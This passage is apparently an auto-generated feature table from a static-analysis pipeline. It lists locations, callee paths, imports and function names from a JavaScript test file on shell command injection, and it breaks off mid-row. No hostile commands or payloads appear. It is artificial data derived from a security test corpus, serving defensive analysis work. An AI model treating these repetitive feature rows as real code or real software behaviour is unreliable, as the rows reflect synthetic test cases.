printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:2:454:7 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:2:454:7 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:2:454:7 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:2:454:15 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:2:454:15 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:2:454:15 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:2:454:23 | module. ... blabity | CalleeFlexibleAccessPath | Object.defineProperties | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:2:454:23 | module. ... blabity | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:2:454:23 | module. ... blabity | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:2:454:23 | module. ... blabity | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:2:454:23 | module. ... blabity | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:2:454:23 | module. ... blabity | receiverName | Object | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:9:454:15 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:9:454:15 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:9:454:15 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:17:454:23 | blabity | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:17:454:23 | blabity | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:454:17:454:23 | blabity | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:455:7 | Object | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:455:7 | Object | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:455:7 | Object | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:455:14 | Object.assign | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:455:14 | Object.assign | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:455:14 | Object.assign | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:469:2 | Object. ... \\n\\t\\t)\\n\\t) | CalleeFlexibleAccessPath | Object.defineProperties | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:469:2 | Object. ... \\n\\t\\t)\\n\\t) | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:469:2 | Object. ... \\n\\t\\t)\\n\\t) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:469:2 | Object. ... \\n\\t\\t)\\n\\t) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:469:2 | Object. ... \\n\\t\\t)\\n\\t) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:469:2 | Object. ... \\n\\t\\t)\\n\\t) | receiverName | Object | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:469:2 | exceptional return of Object. ... \\n\\t\\t)\\n\\t) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:469:2 | exceptional return of Object. ... \\n\\t\\t)\\n\\t) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:469:2 | exceptional return of Object. ... \\n\\t\\t)\\n\\t) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:9:455:14 | assign | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:9:455:14 | assign | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:9:455:14 | assign | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:456:3:456:4 | {} | CalleeFlexibleAccessPath | Object.assign | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:456:3:456:4 | {} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:456:3:456:4 | {} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:456:3:456:4 | {} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:456:3:456:4 | {} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:456:3:456:4 | {} | receiverName | Object | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:8 | Object | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:8 | Object | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:8 | Object | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:16 | Object.entries | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:16 | Object.entries | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:16 | Object.entries | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:25 | Object. ... yFuncs) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:25 | Object. ... yFuncs) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:25 | Object. ... yFuncs) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:25 | exceptional return of Object. ... yFuncs) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:25 | exceptional return of Object. ... yFuncs) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:25 | exceptional return of Object. ... yFuncs) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:32 | Object. ... .reduce | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:32 | Object. ... .reduce | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:32 | Object. ... .reduce | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:468:3 | Object. ... \\t{}\\n\\t\\t) | CalleeFlexibleAccessPath | Object.assign | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:468:3 | Object. ... \\t{}\\n\\t\\t) | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:468:3 | Object. ... \\t{}\\n\\t\\t) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:468:3 | Object. ... \\t{}\\n\\t\\t) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:468:3 | Object. ... \\t{}\\n\\t\\t) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:468:3 | Object. ... \\t{}\\n\\t\\t) | receiverName | Object | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:468:3 | exceptional return of 